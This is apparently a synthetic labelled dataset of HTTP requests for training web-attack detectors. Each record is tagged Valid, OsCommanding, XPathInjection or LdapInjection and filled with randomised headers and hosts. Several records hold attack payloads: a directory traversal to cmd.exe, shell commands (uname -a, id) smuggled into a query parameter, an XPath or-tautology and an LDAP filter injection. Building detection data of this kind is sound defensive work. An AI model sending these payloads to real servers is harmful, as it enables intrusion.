If-Modified-Since: Sat, 30 Jan 10 08:58:49 GMT
If-Unmodified-Since: Fri, 24 Nov 06 22:54:31 GMT
If-Match: "1haSlaTfTe5OGaE"
If-None-Match: "FUHi3Njqe7D1odXws6C"
If-Range: Sun, 14 Jun 09 06:53:30 GMT
Max-Forwards: 29
MIME-Version: 6.1
Pragma: no-cache
Proxy-Authorization: NTLM dHZ1YWRsbHI4ZWFzbGFzb21peTRuUG9uT2VvZGNkcmRwdEZlaDI5b0ViYWFpZDg=
Authorization: NTLM cmxhbnRlZW1vYWVjbmJvaG1oMTluaGNlb3RudG51ZXI=
Range: 577564-305453
Referer: http://iaSrh.com/ho5Xes/hhvrC/tsgzt/Euk5sri/adsoortl.swf
TE: deflate;q=0.3
Trailer: Upgrade
User-Agent: Mozilla/4.1 (X11; U; Linux i586 7.7; ns-As; rv:0.9.2) Gecko/53049876
UA-CPU: StrongARM
UA-Disp: 496,778,32
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 3909x9569
Via: HTTP/1.3 www.3eon.gif, evEof/3.3 206.194.155.125, 4.8 www.eehnetor.html
Transfer-Encoding: tetng; oubnpere=esfTe
Upgrade: esen47/9.3, o2g/8.8, eeLM/5.1
Warning: 238 100.240.156.173:91606 "tbheEToeiftil5hig2" "Sun, 07 Nov 04 20:04:32 CET"
X-Forwarded-For: 41.168.99.7
X-Serial-Number: 935852027842714359
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 29537
Start - Id: 43782
class: OsCommanding
GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
Host: www.rhne.de
Connection: close
Accept: */*;q=0.1
Accept-Charset: x-mac-korean;q=0.8, iso-8859-5;q=0.5, iso-8859-7
Accept-Encoding: *
Accept-Language: xtosiy-Haesce, raarcMtn-udslm, X-nsrSnj;q=0.6, S-e;q=0.6
Cache-Control: min-fresh=31950
Client-ip: 111.17.94.212
Cookie: bgin7im=asl"apacsdrop"atO/ 
Cookie2: $Version="33"
Date: Sat, 15 Dec 07 19:43:54 GMT
ETag: W/"AMC5ZOlrnU7y1Mew"
Expect: 100-continue
From: nrfbhece@hbiiwgu.org
If-Modified-Since: Sat, 12 Apr 08 07:36:36 CET
If-Unmodified-Since: Fri, 24 Apr 09 17:31:31 CET
If-Match: *
If-None-Match: "hG_CvAt8556WPghei"
If-Range: Mon, 09 Aug 04 08:31:48 CET
Max-Forwards: 94
MIME-Version: 7.8
Pragma: hria=r3ttds
Proxy-Authorization: Digest opaque="leSssie"
Authorization: Digest response="C9aF4EC9f3c9b9EB8a5daF58b0fEdBE6"
Range: 10571-03
Referer: /ssilne5e/6jrt/dmsa/daxsrm/naske.avi
TE: trailers,chunked;q=0.2,gzip
Trailer: From
User-Agent: yfnmfb (llpqVyt_; mR98WusCY; sOD5mfk; hXR0zN-.9@; o10ooffoe)
UA-CPU: Sparc
UA-Disp: 624,195,16
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 877x3920
Via: 0.1 84.137.108.135:115, 7.5 www.al0m.js, FTP/9.4 www.tigtruei.html:36627
Transfer-Encoding: gzip
Upgrade: rkdos/5.2, o56Tt/8.3, Tai2zk/6.6, zoWhhE/4.5
Warning: 658 www.Hscsmktn.js:3 "stszn923barrtxs" "Thu, 16 Oct 08 07:29:39 UTC"
X-Forwarded-For: 144.180.167.11
X-Serial-Number: 026026261334603
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 43782
Start - Id: 49330
class: XPathInjection
GET /QRiframeprocessing-instructioniFr0SM-4wp/iQ8l7nqhF.hG0_dl5A/yi/eM3kyyokNzEC/ntlziT09befnweg.php3?N0h2vltto=u%29nceihyau&9elrbje32h=iWepWA%40.dBG&fpnz5a=nkoesrecgoiem&t4oeiKi=09&eoooioirmBSha=2677&hNFFKaz=phAsd%2Fw%2Ft%2Fchild%3A%3Anode%28%29%5B++position%28%29%3D066%5D+%7C++au%2FcwBh%2Feon%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D5%5D++++or+++%27nd%27++%3D+++%27&wjBidN=aUtd&tsmere=mhttpnsock_streamtwrhxp_lsib&o3Er2atopn=C4og HTTP/1.0
Host: 131.163.30.42:80
Connection: keep-alive
Accept: application/*
Accept-Charset: koi8;q=0.5, hz-gb-2312, ks_c_5601-1987;q=0.9
Accept-Encoding: compress;q=0.8, compress;q=0.2, deflate, identity;q=0.2
Accept-Language: *
Cache-Control: no-transform
Client-ip: 23.148.126.23
Cookie: baeohBtFshlet1=76246;twhdoniH=e0cqdAxan(1esock_stream3;ed=nts7;faZTmR=44686;me5Tti=ecao;7jre=hr'
Cookie2: $Version="94"
Date: Thu, 17 Jul 08 08:58:04 GMT
ETag: "f-78hbGcyMFOKmfms"
Expect: tpfss
From: 5sny@toesr.uk
If-Modified-Since: Mon, 08 Sep 08 24:30:08 GMT
If-Unmodified-Since: Wed, 17 Mar 10 21:19:13 GMT
If-Match: "gyKNbR_I5KPfq01"
If-None-Match: *
If-Range: "TG60.2S9uFo5UNOb7qoX"
Max-Forwards: 61
MIME-Version: 6.3
Pragma: ee5rhcb='se'
Proxy-Authorization: artrps eibl=2ExpiAa
Authorization: Basic c29pZTplbHRxcmVN
Range: -8
Referer: http://www.nm0mr.ch/9Rhigsac.conf
TE: trailers,trailers,trailers
Trailer: Warning
User-Agent: Mozilla/3.7 (X11; U; SunOS sun4u 9.8; rM-ja; rv:2.0.4) Gecko/43231060
UA-CPU: StrongARM
UA-Disp: 576,409,16
UA-OS: Linux
UA-Color: color16
UA-Pixels: 953x2070
Via: 4.5 www.emhukO.tiff, FTP/7.8 www.ansa.tiff
Transfer-Encoding: compress
Upgrade: vJltet/0.9, dda/3.3, iieen/3.3, aNr4k2/1.4, h82fxs/8.6
Warning: 906 www.mgsdP.jpg "luEthgfredan" 
X-Forwarded-For: 100.79.4.137
X-Serial-Number: 6608359
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49330
Start - Id: 28632
class: Valid
GET /4sIFbetweenm8EEscriptM/srytttjwiecedrts7rz/mn_Lb2t1/C@P@allyf/aR3IA7NwWZg2duTNyTT/rnaneuq0hogewe5murpw/emW9ltoBM46@c4Wk0A3/ud@dVE3AN/lHgVlB0g56dwK9.Tb/olutothswenxxnIeti/rc/O7YlAVl.mdb?he9s=350&rcp5Qtmpk6PoB=33523&QELUpd=lIampa60hVaha3doql&iduke=+M8ay&isystnhq8hdict3=t4o+Tnesvt8l&naholT=yvmetaE%3Ew&nkoepeeotllPn=hcoa&tEgEn=eataEsystemi+sc%28n HTTP/1.1
Host: 148.225.144.22
Connection: close
Accept: video/mpeg, text/xml;q=0.2
Accept-Charset: x-mac-arabic;q=0.4, koi8-r
Accept-Encoding: 
Accept-Language: ddni-srht;q=0.7, 4ocqe-7kdraidi, q1eh5by-viH;q=0.0, thpnt6r-efypo;q=0.6, enmQ-nhxh;q=0.6
Cache-Control: no-transform
Client-ip: 158.158.21.22
Cookie: erlecymNsl=8857466;asephh=d
Cookie2: $Version="6"
Date: Wed, 30 Mar 05 03:59:47 GMT
ETag: "m61Hns7ULAUNoP7"
Expect: veRndioe=tfNemfiT
From: 6EaEszit@irni.st
If-Modified-Since: Mon, 16 Aug 04 21:27:57 CET
If-Unmodified-Since: Wed, 29 Jul 09 02:38:28 GMT
If-Match: *
If-None-Match: "XC_EJ73I8t7K3C3"
If-Range: "jZ4bgvsWz.y0iXY"
Max-Forwards: 0610
MIME-Version: 9.0
Pragma: hz4tid=9nst
Proxy-Authorization: Basic cnRtYjppTW9naDVz
Authorization: Basic NGFoUzplZHdo
Range: 298-9,-9744,83-
Referer: http://Oaaattxa.st/btnue/oCOz.dll
TE: chunked;q=0.8,trailers,trailers
Trailer: Transfer-Encoding
User-Agent: XhofoniuthvreMnn4m
UA-CPU: 68000
UA-Disp: 8045,183,32
UA-OS: Win98
UA-Color: color16
UA-Pixels: 680x3732
Via: 8.0 247.196.118.135
Transfer-Encoding: deflate
Upgrade: Wtis/2.1, nat7E3/0.0, faaei/4.9, oas/2.1, fFtihs/4.5
Warning: 540 www.aacWusmD.jpeg "ehptcl" "Thu, 30 Mar 06 12:01:08 GMT"
X-Forwarded-For: 250.195.95.132
X-Serial-Number: 6114886940251
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 28632
Start - Id: 43525
class: OsCommanding
GET /trs/positiongLFD9./etKb/eoibhnJnIasz7.cfm?filn0SiL=%29echo9oscripthavingiemog&ast9jrWsksabeld=lJ9&eR0reBfd=65&rzdianayeoht=aaedlxo0ee&uA8drlfke7t2t=55668&eRiSTLKbgsoundyzl=aJ6V&mteeec=%7Ca-upnqw+oen0amochah&koar=+++++%3B+++echo+++++++%3B+++++w+++%3B+++uname+++++-a++++++%3B++id&HKaTM=2279376 HTTP/1.0
Host: 238.42.12.32
Connection: keep-alive
Accept: */*;q=0.5
Accept-Charset: iso-8859-4;q=0.3, x-mac-greek, gb2312;q=0.2, x-mac-arabic;q=0.4
Accept-Encoding: compress, compress;q=0.0
Accept-Language: https-ost;q=0.5, zAp-iames2
Cache-Control: hvb0=helOnr
Client-ip: 254.18.78.75
Cookie: inihfibteneoc=mSKkjJU
Cookie2: $Version="7"
Date: Thu, 23 Mar 06 24:04:12 UTC
ETag: W/"3MhJB@hH6iEmRFtgb"
Expect: 100-continue
From: ioojil@heyq.net
If-Modified-Since: Mon, 07 Sep 09 24:02:13 UTC
If-Unmodified-Since: Thu, 23 Apr 09 16:29:47 CET
If-Match: *
If-None-Match: "wnlTDEI15qNxuXbo"
If-Range: Thu, 26 Mar 09 21:13:17 UTC
Max-Forwards: 056
MIME-Version: 3.5
Pragma: unosnta9=cedd9naE
Proxy-Authorization: NTLM bHNwMmNsQ2JpT3RubWVzZmFpdGtpaG9sZGlPSGlpdUVoY28=
Authorization: Basic bnRDZWRlbHo6ZXJlQ2g=
Range: -2781,-259,93-77910
Referer: http://ojd4or.cz/pscas/pcetno/t0smnsid/iohlstte/Ou8tpr.tiff
TE: deflate,trailers,trailers
Trailer: User-Agent
User-Agent: Mozilla/4.3 (Windows; U; Win98 4.7; hn-s7; rv:0.8.9) Gecko/37275388
UA-CPU: PowerPC
UA-Disp: 308,529,32
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 956x530
Via: 8.2 www.rlonRrlt.tiff:87527, HTTP/2.3 236.72.8.74
Transfer-Encoding: gzip
Upgrade: icjo/5.5
Warning: 156 193.81.211.74 "9aeu3wesnnaer" 
X-Forwarded-For: 118.79.162.108
X-Serial-Number: 61216613
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43525
Start - Id: 18415
class: Valid
GET /Adgwop6N1/5j78R2PO/4TPH9_zu-FViwsfS6l/nuouan5Iexdrehtsnjnn/oAeUCuRmihgk3yD/aEJ5pd.jsp?osmoarlmxHsNi=npldotipbsg&s6BrdemieTtmynb=diviqone%2Btodw&tnvaNrtadiuoo3u=yAept+t%5Cee%26&hneiiJsKerwG=tjieoywt&e66Codsu=352812150&ra4aiovt6esw=mBW5bYzX_L&0ntersezd6c2i=rpedhmt6&ogsj2i=nuD+s%3Bgrsdocument&edif0H379a5ds=%25ceh HTTP/1.1
Host: www.cshtom.org
Connection: Frnl
Accept: text/plain
Accept-Charset: x-mac-chinesetrad;q=0.5, cp-932;q=0.6, iso-10646-ucs-2
Accept-Encoding: *
Accept-Language: Co3-Ccbda, s-fThhsR
Cache-Control: min-fresh=20283
Client-ip: 183.39.30.120
Cookie: sidtomrdricseme=am05pePpmSqn;nyaR5tp=li;s5nwBqczov9m=rhtaccesthdeleten9?r;o4nhyNhfssertv=ns7;tth=024722
Cookie2: $Version="641"
Date: Wed, 15 Jun 05 12:05:01 UTC
ETag: W/"GD7QBP8tkY7nPwAAW"
Expect: eeic
From: iorhw@fhlRqaapa.cz
If-Modified-Since: Mon, 10 Apr 06 01:04:25 GMT
If-Unmodified-Since: Mon, 02 Jun 08 15:01:33 UTC
If-Match: *
If-None-Match: *
If-Range: "xU2zh9ZxZm8jsTv"
Max-Forwards: 2
MIME-Version: 9.8
Pragma: no-cache
Proxy-Authorization: NTLM cjNtZWFMb1Ntc2J5cmVxbkRkb3lwUkVlZXJydDV0Ym5kb3I2SHR1b2lld2Vv
Authorization: Basic NHJudzp0YUNiZQ==
Range: 0752-,8-,-9405
Referer: /oes8i9au/ZDntwr/roZsyge.php
TE: gzip,trailers
Trailer: Cache-Control
User-Agent: RduiTmape/6.0.0.7.0
UA-CPU: 68000
UA-Disp: 1388,0404,32
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 342x6218
Via: 3.0 133.104.193.88:953, 2.9 136.4.213.77, 9.5 39.88.132.203
Transfer-Encoding: beo46n; ear4bs1=nI4l
Upgrade: fr6/9.1, a7d/9.3, ieeyad/2.3, bel/9.8, 1ryi/9.2
Warning: 382 234.104.119.196 "nOJdiaeAxptcthqErre" 
X-Forwarded-For: 157.164.79.230
X-Serial-Number: 2956272403318008567
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 18415
Start - Id: 530
class: Valid
GET /4CZVNuNBmL2rm5J.shtml?gtepaonrA=oeeizlor-Wcopy%3Au%3Dokps3&tC=kd-&eflEamtInnh9=oblHM%408&ua9d7kiyEw3w=90722250&aleonld=elurentCp1bc3&qabdra8rnn3ddoi=oq&rNreoc5ato=6399&o3eTvjoe4=AterneEm%3Befe&Fi8EJVcSh=85 HTTP/1.0
Host: www.edaey.gov:80
Connection: keep-alive
Accept: */*;q=0.7
Accept-Charset: cp-950;q=0.9, shift_jis
Accept-Encoding: gzip;q=0.0, deflate;q=0.9
Accept-Language: rthns-7r, laArbtd-me
Cache-Control: no-transform
Client-ip: 245.11.225.60
Cookie: wcceeswiheh=daakkhmd9nniet2;oe=dtooOqcmd=iZ;orewE=e'~l
Cookie2: $Version="7"
Date: Mon, 29 Jan 07 21:08:52 CET
ETag: "3_MVKxZmRA3BZXtnp"
Expect: sdbh
From: Tkar@ty3hCoans.biz
If-Modified-Since: Wed, 24 Jun 09 13:15:34 GMT
If-Unmodified-Since: Sat, 08 Oct 05 21:58:35 GMT
If-Match: "l.EGNDX1sgEEOd."
If-None-Match: *
If-Range: *
Max-Forwards: 4412
MIME-Version: 6.5
Pragma: no-cache
Proxy-Authorization: Digest realm
Authorization: EIsa nO2uakjo=eiws
Range: 5893-9457,819085-8
Referer: http://www.otner3m.gov/iesdd/txf0mFe.js
TE: deflate,deflate
Trailer: Range
User-Agent: Mozilla/2.4 (Windows; U; Win 9x 1.2; eu-dh; rv:5.7.4) Gecko/55705260
UA-CPU: StrongARM
UA-Disp: 156,7636,16
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 425x931
Via: 4.4 www.whtpc.css, HTTP/3.4 www.sttgk.shtml
Transfer-Encoding: deflate
Upgrade: iEaOeu/0.3, n1ooih/5.9, nlStt/9.5
Warning: 031 173.215.193.129 "koSnmyiqOdiUot" "Fri, 03 Apr 09 01:48:11 UTC"
X-Forwarded-For: 1.240.169.3
X-Serial-Number: 35520
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 530
Start - Id: 37850
class: LdapInjection
GET /9E27aeacieG56saSyd.tiff?ast=%29++%28+++%7C+++%28xedn%3Dmhiie*%29 HTTP/1.0
Host: 39.114.229.153
Connection: ion1h9g
Accept: audio/x-wav;q=0.5
Accept-Charset: x-mac-icelandic;q=0.0, windows-1252;q=0.9, utf-7
Accept-Encoding: identity, identity, gzip;q=0.3, compress;q=0.3
Accept-Language: *;q=0.3
Cache-Control: max-stale
Client-ip: 177.246.9.242
Cookie: qLowp-khw=50824990;w90iaioUwo=osi
Cookie2: $Version="033"
Date: Wed, 24 Feb 10 24:51:27 GMT
ETag: "5zNxKaSEcACZS8Il5w"
Expect: dhfasa=tehi4Sz;l9ae
From: dxmog@eeOtwtfr.com
If-Modified-Since: Sun, 14 Mar 04 06:29:18 UTC
If-Unmodified-Since: Wed, 30 Jan 08 18:20:54 GMT
If-Match: *
If-None-Match: *
If-Range: "lztkpF4YPK-N_XC"
Max-Forwards: 8
MIME-Version: 3.3
Pragma: keZrmoo='hpAe'
Proxy-Authorization: NTLM emh5cDRTbWlJb2U3anRzeXJkOW9pY3NiOWhhYWQ0aXNldA==
Authorization: NTLM ZUVydnJlZWVpb3YzcnJyamVydElkYW80bm9kZWVvaXc=
Range: 853418-,-430
Referer: /ae6eeztb/elemh/sia8itn/nadhost.pdf
TE: chunked,trailers
Trailer: Referer
User-Agent: Omtotenaib7yRo08oamr
UA-CPU: x86
UA-Disp: 780,4386,32
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 878x215
Via: 4.3 198.154.35.115, 8.2 67.23.2.79, 5.9 254.55.179.110
Transfer-Encoding: identity
Upgrade: uoE/5.1, iitjl/6.0
Warning: 381 69.182.116.155 "Nlsokote2jdearNL" "Fri, 14 Nov 08 18:53:43 CET"
X-Forwarded-For: 109.105.145.129
X-Serial-Number: 300384
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37850
Start - Id: 22993
class: Valid
GET /i8kVGT8RSNu5Ul/SvdhVphpsock_stream_iC3P1jk/Di1w3ZI3h/miqs1t/eaai3yMief/bucdeptN5Ublste.exe? HTTP/1.0
Host: 160.199.97.56:80
Connection: u7dio
Accept: application/*, application/*
Accept-Charset: isiri-3342, utf-8;q=0.8, macintosh, cp-936;q=0.0
Accept-Encoding: identity, gzip;q=0.8, compress, identity, gzip;q=0.9
Accept-Language: *
Cache-Control: no-transform
Client-ip: 84.81.179.39
Cookie: eolhBsgtau4ht=3sFe;mgO=a
Cookie2: $Version="83"
Date: Mon, 10 Nov 08 15:04:29 GMT
ETag: "_0gV7NM8NyRumOR6klMt"
Expect: 100-continue
From: pesd@at4tios7ee.ch
If-Modified-Since: Sat, 04 Aug 07 03:02:42 CET
If-Unmodified-Since: Sun, 15 Feb 09 10:21:06 CET
If-Match: "eaMoMaKr5-RiFsneNwvo"
If-None-Match: *
If-Range: Mon, 28 May 07 23:04:38 UTC
Max-Forwards: 6
MIME-Version: 6.6
Pragma: no-cache
Proxy-Authorization: fmr5 Ld67ld=n9o0r
Authorization: Basic N2hlTGg6czlreg==
Range: 524874-69455
Referer: /uhsa/nnJeotx/emuaD/to0e/o9jctlt.cgi
TE: trailers
Trailer: Pragma
User-Agent: seecomdai6cmvs
UA-CPU: 68000
UA-Disp: 052,5191,32
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 465x0327
Via: 4.2 180.255.61.20
Transfer-Encoding: identity
Upgrade: bae/0.4, hee6y0/8.7, soqh/2.5, sdle8/1.8, bdseN/0.5
Warning: 183 169.73.238.29 "ettes1Theraatk2r3Re" 
X-Forwarded-For: 208.109.201.230
X-Serial-Number: 91483832
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 22993
Start - Id: 27014
class: Valid
GET /oGU2HdMuV73th/rAeSTwH19pqA2/iliergurttciesid/iOwiCS/ismabrdhsgye5nhErsso/i9PpOwDfLj-o9I.shtml?LzshBs3tteore=%2BlD+sahat&owoixariaarehnN=E HTTP/1.0
Host: 161.135.169.153
Connection: close
Accept: image/png;q=0.7, application/x-tar;q=0.7
Accept-Charset: *
Accept-Encoding: 
Accept-Language: sttbhoqg-aaiati;q=0.9, skohwtte-t;q=0.4, rr-SyxagN, tn-a
Cache-Control: max-age=42334
Client-ip: 202.222.48.227
Cookie: ntiolc0rtogsGit=zm0J
Cookie2: $Version="7"
Date: Thu, 24 Jul 08 12:17:51 UTC
ETag: W/"xr5ltJLATm0k7Up8"
Expect: tncr=iroe;uoonohpD
From: erxoee@uwm9y1m1lh.net
If-Modified-Since: Mon, 30 Jul 07 14:07:08 GMT
If-Unmodified-Since: Fri, 06 Feb 09 07:47:06 CET
If-Match: *
If-None-Match: "38Ni.xdRA8jdtKDx"
If-Range: Wed, 15 Jun 05 03:20:48 CET
Max-Forwards: 8
MIME-Version: 9.2
Pragma: gviseh5=1stbue
Proxy-Authorization: Basic b3RuaWFSYTpodG5vdGk=
Authorization: Basic blVtaWY2ZTplaDFzbA==
Range: -2,41933-,520-237717
Referer: http://www.l5fPnrt.org/su6etn/oi2ectTr/n5ee/ieDhryz/EbIzPwit.pl
TE: chunked,chunked,trailers
Trailer: If-Modified-Since
User-Agent: jarK3si/7.4.2.3.9
UA-CPU: StrongARM
UA-Disp: 9952,4769,32
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 6860x985
Via: 2.1 www.o4lr.tiff:4, HTTP/5.3 www.cegd.jpg
Transfer-Encoding: deflate
Upgrade: rt4na/4.6
Warning: 866 www.tvytE8.tiff "nAg6tTeeSfegQmnsr" "Fri, 23 Jan 09 21:23:14 GMT"
X-Forwarded-For: 41.72.7.124
X-Serial-Number: 044628403865757312
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 27014
Start - Id: 18600
class: Valid
GET /dnhOdtt/tdatiikr/ovYbco/inpassthruDEWLNvMNRVI/4oH0aoncne/W8nc/hyiuu/e2wauo/6CJF0Tc.6.mdb?hnislip=setea&ehhnjsxeYtS=b0extea&tpjeowo1m=e%40e&pex2gsuz=231mRia6l7a4nper&rcnonocorzyyy=10516190&Nd=0FBv&e8nrahE=l4documenthhi%27%2Br+oasm&36EO=cteeU&eM7b3hgi=rsiiin590mdes5e&pze4ydten=xSftp%3E HTTP/1.1
Host: www.aeid.com:80
Connection: close
Accept: */*;q=0.0
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *;q=0.7
Cache-Control: r81ac=LTvoeoe
Client-ip: 92.140.82.89
Cookie: KSVnDSVS@._=iesqdnpjn2S29ta;snn886r=execrbodyak2es%a
Cookie2: $Version="5"
Date: Sat, 06 Dec 08 02:15:15 CET
ETag: "vWm7vOC-z_8BLqnHk.@U"
Expect: eaat1ww
From: issa@v6tset.fr
If-Modified-Since: Fri, 13 Mar 09 04:40:29 GMT
If-Unmodified-Since: Thu, 22 Oct 09 14:54:12 GMT
If-Match: "VIx98_4XQ1Ji4kmmf"
If-None-Match: "acn8_wX9A-o6kQkyv"
If-Range: *
Max-Forwards: 6
MIME-Version: 6.0
Pragma: to=n
Proxy-Authorization: NTLM ZXB1ZWJyZXJlb29jVmk1c2VocnRUYW9kdGdsdHJ0ZmVsbkd0
Authorization: oau0 QpnW0oee=norggic
Range: 0-15536,8-008663
Referer: /muih/11i73s/awctrnwo.bin
TE: chunked;q=0.7,gzip;q=0.4
Trailer: If-Range
User-Agent: Mozilla/7.2 (Machintosh; U; Mac OS X 3.3; Tn-bn; rv:7.6.6) Gecko/93330644
UA-CPU: StrongARM
UA-Disp: 1268,0056,32
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 8012x674
Via: FTP/8.1 www.oeHas.png
Transfer-Encoding: compress
Upgrade: fsooht/0.4, Rtho/8.1
Warning: 224 www.anwi.tiff:36 "snstrTt" "Mon, 04 Jun 07 16:58:27 GMT"
X-Forwarded-For: 72.228.20.6
X-Serial-Number: 74074067
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 18600
Start - Id: 31625
class: Valid
GET /mct0@z1u/4osu7elho4ct3elrpr/Nstnc/nBeo/Iposition_-qk4BZ1/YnjTO6group byZUobUpg/8ir9Ameot/jztsPc/leIcStaqc/dlubehrgrfhz9/eiuion9t5e0zssR/e-.cgi? HTTP/1.0
Host: www.erik29.net
Connection: close
Accept: audio/basic;q=0.5
Accept-Charset: macintosh, euc-tw;q=0.3, iso-8859-4
Accept-Encoding: *;q=0.1
Accept-Language: ne-znqllw
Cache-Control: no-cache
Client-ip: 51.126.92.214
Cookie: eaoheySl9Gao=h1evedsiolrhaee
Cookie2: $Version="86"
Date: Sun, 08 Aug 04 21:10:15 GMT
ETag: W/"ywRJ44ZaNecFGg2Jqedc"
Expect: poiC
From: n5thead@ltwr.cz
If-Modified-Since: Sun, 06 Nov 05 16:06:06 GMT
If-Unmodified-Since: Sat, 27 Nov 04 12:01:30 UTC
If-Match: "8jZhjJI415vpRZL25M"
If-None-Match: "o6S@iTMscqofkIi4rm"
If-Range: Wed, 10 Aug 05 20:08:01 UTC
Max-Forwards: 9400
MIME-Version: 7.4
Pragma: aui8=s6
Proxy-Authorization: Digest response="4B6aB8CAa1D9dcf955967eDE7E368bbC"
Authorization: Basic cGhlZTppaGVjdA==
Range: 2998-103,-3,3141-
Referer: http://k6eucsuw.st/RNoe/vt6td/qureui/ltiEuTz/puejoe.php4
TE: gzip,trailers
Trailer: Warning
User-Agent: Mozilla/3.7 (Machintosh; U; PPC 5.1; rx-in; rv:0.7.5) Gecko/39005760
UA-CPU: 68000
UA-Disp: 0279,131,8
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 8191x528
Via: 0.7 128.100.242.53
Transfer-Encoding: lqe4m
Upgrade: o45mrn/3.4, Xue/3.4, Eoh/8.3, ote/8.9, 9Uiay/0.3
Warning: 121 104.245.152.198 "ded0w6so" "Tue, 17 Jul 07 05:58:44 UTC"
X-Forwarded-For: 13.228.134.190
X-Serial-Number: 049800080
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 31625
Start - Id: 18295
class: Valid
GET /uzGY/qXwQ/owera/Y@08K8@BYP@EOg/cniool/9@_W4TMf/e0iz6IUn5KjI/lOz4HP_ZXxP/MXvt657aME2/rQ.BKx1re1Piolddl/YS2/riesiucfy0aosooenA.html?eemain=Eitentmtm2D HTTP/1.1
Host: www.iul2ceghQ4.com
Connection: hosyt2
Accept: */*
Accept-Charset: *;q=0.2
Accept-Encoding: 
Accept-Language: tdIi5-st
Cache-Control: max-stale
Client-ip: 71.143.27.9
Cookie: heo0brgjret=n9CgZmOYCpfK;iazs1SoriFwr=407;njtissa=5yQj
Cookie2: $Version="49"
Date: Mon, 01 Sep 08 16:23:38 GMT
ETag: "@u3l8ojv12CM3I0QQw2"
Expect: iacel
From: tdgpai@cdetEa3.uk
If-Modified-Since: Mon, 10 Jan 05 03:22:08 CET
If-Unmodified-Since: Mon, 13 Feb 06 10:56:15 CET
If-Match: *
If-None-Match: *
If-Range: Thu, 12 May 05 06:52:52 UTC
Max-Forwards: 1310
MIME-Version: 6.5
Pragma: lr=titec
Proxy-Authorization: Digest username="l8rspce"
Authorization: oezd gpzri=1vzeoha9
Range: -00,842627-,308-
Referer: /lueOj/asNOa/gtwzivd/k0ciOgo/e7aci.zip
TE: trailers,deflate,trailers
Trailer: Transfer-Encoding
User-Agent: tnt0 (s0@Uj_I@.R)
UA-CPU: MIPS
UA-Disp: 372,7656,32
UA-OS: Win98
UA-Color: color32
UA-Pixels: 7711x8237
Via: 0.6 www.me2m.css, FTP/8.5 www.rtieioZe.css, FTP/0.6 www.bdsyth.html
Transfer-Encoding: deflate
Upgrade: oiau7a/3.9, vedts/8.8
Warning: 976 www.eoEas.jpg "rrr4ocEA9Sfs0d" "Tue, 11 Jul 06 23:30:39 CET"
X-Forwarded-For: 44.250.109.77
X-Serial-Number: 9583617026420490127
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 18295
Start - Id: 34318
class: Valid
POST /ePr8ORJVph.Qod1t2/neu8tA7EdhoNpll0e/fFYEYiWbJ.mspx? HTTP/1.1
Content-Length: 105
Content-Language: aedetsgo,4esauCl,Setlhr
Content-Encoding: identity
Content-Location: /eefe0ej/oselte1/wavsrer.doc
Content-MD5: amVkcGxoclRiaHBzdGd5aQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 29 Dec 07 10:40:50 UTC
Last-Modified: Wed, 16 Dec 09 21:23:09 CET
Host: 43.128.55.35:80
Connection: keep-alive
Accept: */*;q=0.7
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-cache
Client-ip: 162.72.47.178
Cookie: CTUq8Kz=eu7heeoEexkOme;rm7ked6nowpieh=ta;iefvautldsyefh=neNXnciNrpoelpwoir;f3vLQC=e1p7<uaarm;r7gna3wnos2o=nherarafutreieui
Cookie2: $Version="975"
Date: Sat, 17 Nov 07 19:32:31 GMT
ETag: "oCWYxdxSE.sRjMMagk8"
Expect: 100-continue
From: viamr6@yergvcA.biz
If-Modified-Since: Sat, 20 Aug 05 17:16:56 GMT
If-Unmodified-Since: Wed, 10 Nov 04 11:40:00 UTC
If-Match: *
If-None-Match: *
If-Range: Fri, 06 Jun 08 19:51:33 CET
Max-Forwards: 513
MIME-Version: 1.2
Pragma: lmen=4itEos1
Proxy-Authorization: NTLM aU9yd2hldW1uZ3RycnFtdUhqZUE0b3U5cmVzdGJyc3RhZTFnYWk1bnZveWVMbQ==
Authorization: NTLM cnJyc3RyaDdkdWRhV2FlcmRwM3ljZWh0ZmJkdGVFY2Ezd2FsVG5uNW94bWl0eXc=
Range: -278160
Referer: http://eoLnceet.ch/blw8o/xBvtz/Oa5Ext/udv5e/irOiw1m.nsf
TE: trailers,gzip
Trailer: Authorization
User-Agent: alebduehA
UA-CPU: Sparc
UA-Disp: 693,674,16
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 232x3371
